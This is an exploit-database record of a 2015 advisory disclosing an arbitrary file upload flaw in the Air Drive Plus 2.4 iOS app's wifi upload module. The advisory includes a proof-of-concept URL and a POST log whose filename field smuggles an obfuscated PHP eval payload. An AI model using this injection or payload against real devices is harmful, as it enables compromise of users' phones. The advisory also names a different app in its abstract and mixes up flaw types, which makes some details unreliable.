{"bulletinFamily": "exploit", "id": "EDB-ID:38258", "cvelist": [], "modified": "2015-09-22T00:00:00", "lastseen": "2016-02-04T07:40:34", "edition": 1, "sourceData": "Document Title:\r\n===============\r\nAir Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability\r\n\r\n\r\nReferences (Source):\r\n====================\r\nhttp://www.vulnerability-lab.com/get_content.php?id=1597\r\n\r\n\r\nRelease Date:\r\n=============\r\n2015-09-21\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1597\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n8.7\r\n\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nTurn your iPhone, iPod touch, and iPad into a wireless disk. Share your files and photos over network, no USB cable or extra software required.\r\n\r\n(Copy of the Vendor Homepage: https://itunes.apple.com/tr/app/air-drive-plus-your-file-manager/id422806570 )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe Vulnerability Laboratory Research Team discovered an arbitrary file upload web vulnerability in the official Photo Transfer 2 - v1.0 iOS mobile web-application.\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2015-09-21:\tPublic Disclosure (Vulnerability Laboratory)\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nAffected Product(s):\r\n====================\r\nY.K. YING\r\nProduct: Air Drive Plus - iOS Mobile (Web-Application) 2.4\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity Level:\r\n===============\r\nHigh\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nAn arbitrary file upload web vulnerability has been discovered in the official Air Drive Plus v2.4 iOS web-application.\r\nThe arbitrary file upload web vulnerability allows remote attackers to unauthorized include local file/path requests \r\nor system specific path commands to compromise the mobile web-application.\r\n\r\nThe web vulnerability is located in the `filename` value of the `Upload` module. Remote attackers are able to inject own files with \r\nmalicious `filename` values in the `Upload` POST method request to compromise the mobile web-application. The local file/path include \r\nexecution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to inject the lfi payload \r\nby usage of the wifi interface or local file sync function. \r\n\r\nAttackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious \r\nattack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. \r\n\r\nThe security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.7. \r\nExploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege web-application user account. \r\nSuccessful exploitation of the arbitrary file upload vulnerability results in mobile application compromise or connected device component compromise.\r\n\r\nRequest Method(s):\r\n\t\t\t\t[+] [POST]\r\n\r\nVulnerable Module(s):\r\n\t\t\t\t[+] Upload\r\n\r\nVulnerable Parameter(s):\r\n\t\t\t\t[+] filename\r\n\r\nAffected Module(s):\r\n\t\t\t\t[+] Index File Dir Listing (http://localhost:8000/)\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe arbitrary file upload web vulnerability can be exploited by remote attacker without privilege web-application user acocunt or user interaction.\r\nFor security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.\r\n\r\nPoC Payload(s):\r\nhttp://localhost:8000/AirDriveAction_file_show/%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]%20src=a%3E2.png\r\n\r\n\r\nPoC: Source (Upload File)\r\n<tbody id=\"files\"><tr><td colspan=\"8\"><a href=\"#\" onclick=\"javascript:loadfiles(\"/AirDriveAction_ROOTLV\")\">.</a></td></tr><tr><td colspan=\"8\"><a href=\"#\" onclick=\"javascript:loadfiles(\"/AirDriveAction_UPPERLV\")\">..</a></td></tr><tr class=\"\"><td><img src=\"./images/file.png\" height=\"20px\" width=\"20px\"></td><td><a target=\"_blank\" href=\"/AirDriveAction_file_show/68-2.png\">68-2.png</a></td><td>24,27KB</td><td align=\"center\">2015-09-11 13:13:25</td><td align=\"center\"><a onclick=\"javascript:delfile(\"68-2.png\");\" class=\"transparent_button\">Delete</a></td></tr><tr class=\"\"><td><img src=\"./images/file.png\" height=\"20px\" width=\"20px\"></td><td><a target=\"_blank\" href=\"/AirDriveAction_file_show/%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]\">2.png</a></td><td>538,00B</td><td align='center'>2015-09-11 13:17:21</td><td align='center'><a onclick='javascript:delfile(\"%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]%20src=a%3E2.png\");' class='transparent_button'>Delete</a></td></tr></tbody></table></iframe></a></td></tr></tbody>\r\n\r\n\r\n--- PoC Session Logs [POST] ---\r\nStatus: pending[]\r\nPOST http://localhost:8000/AirDriveAction_file_add Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr\u00f6\u00dfe des Inhalts[unknown] Mime Type[unknown]\r\n Request Header:\r\n Host[localhost:8000:8000]\r\n User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]\r\n Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]\r\n Accept-Language[de,en-US;q=0.7,en;q=0.3]\r\n Accept-Encoding[gzip, deflate]\r\n Referer[http://localhost:8000/index_files.html]\r\n POST-Daten:\r\n POST_DATA[-----------------------------52852184124488\r\nContent-Disposition: form-data; name=\"uploadfile\"; filename=\"<?php\r\n//Obfuscation provided by BKM - PHP Obfuscator v2.47: $kda1640d3bfb=\"\\x62\\141\\x73\\145\\x36\\64\\x5f\\144\\x65\\143\\x6f\\144\\x65\";@eval($kda1640d3bfb(\r\n\"JGU3NTJiNzQxMTZhYzYwMjUzMDFiYWNlOGUwZTA2YmNiPSJc ... ... ...2MVx4MzhcNjJceDMwXDY3XHgzOFw2M1x4MzlcNjBceDM3XDE0Mlx4MzZcNjdceDM5XDE0NFx4MzVcMTQzXHg2Nlw\r\nxNDZceDY1XDYzXHgzN1wxNDEiKT8kYjdkOTFjZDYwMzJlNDRiNDgzY2Y5MGRhOWM4ZmI1MDAoKTokdTZiZmM2YmN\r\njZjRiMjk4ZDkyZTQzMzFhMzY3MzllMjAoKTs=\"));\r\n?>\r\n2.png\"\r\nContent-Type: image/png\r\n\r\nStatus: 200[OK] \r\nGET http://localhost:8000/a[ARBITRARY FILE UPLOAD VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Gr\u00f6\u00dfe des Inhalts[unknown] Mime Type[unknown]\r\n Request Header:\r\n Host[localhost:8000]\r\n User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]\r\n Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]\r\n Accept-Language[de,en-US;q=0.7,en;q=0.3]\r\n Accept-Encoding[gzip, deflate]\r\n Referer[http://localhost:8000/index_files.html]\r\n \r\n\r\n\r\nReference(s):\r\nhttp://localhost:8000/index_files.html\r\nhttp://localhost:8000/AirDriveAction_file_add/\r\nhttp://1localhost:8000/AirDriveAction_file_show/\r\n\r\n\r\nSecurity Risk:\r\n==============\r\nThe security risk of the arbitrary file upload web vulnerability in the filename value is estimated as high. (CVSS 8.7)\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nVulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed \r\nor implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable \r\nin any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab \r\nor its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for \r\nconsequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \r\npolicies, deface websites, hack into databases or trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t \t\t- www.evolution-sec.com\r\nContact: admin@vulnerability-lab.com \t- research@vulnerability-lab.com \t \t\t- admin@evolution-sec.com\r\nSection: magazine.vulnerability-db.com\t- vulnerability-lab.com/contact.php\t\t \t- evolution-sec.com/contact\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t \t\t- youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php \t\t- vulnerability-lab.com/rss/rss_news.php\r\nPrograms: vulnerability-lab.com/submit.php \t- vulnerability-lab.com/list-of-bug-bounty-programs.php\t- vulnerability-lab.com/register/\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to \r\nelectronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by \r\nVulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website \r\nis trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact \r\n(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.\r\n\r\n\t\t\t\tCopyright \u00a9 2015 | Vulnerability Laboratory - [Evolution Security GmbH]\u2122\r\n\r\n\r\n\r\n-- \r\nVULNERABILITY LABORATORY - RESEARCH TEAM\r\nSERVICE: www.vulnerability-lab.com\r\nCONTACT: research@vulnerability-lab.com\r\nPGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt\r\n\r\n\r\n\r\n", "published": "2015-09-22T00:00:00", "href": "https://www.exploit-db.com/exploits/38258/", "osvdbidlist": ["127903"], "reporter": "Vulnerability-Lab", "hash": "c70880aa8258c804a155464c68668025fbbe1b05b938414ef33f0d7f2b8b1789", "title": "Air Drive Plus 2.4 - Arbitrary File Upload Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Air Drive Plus 2.4 - Arbitrary File Upload Vulnerability. Webapps exploit for ios platform", "references": [], "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/38258/", "enchantments": {"vulnersScore": 2.8}}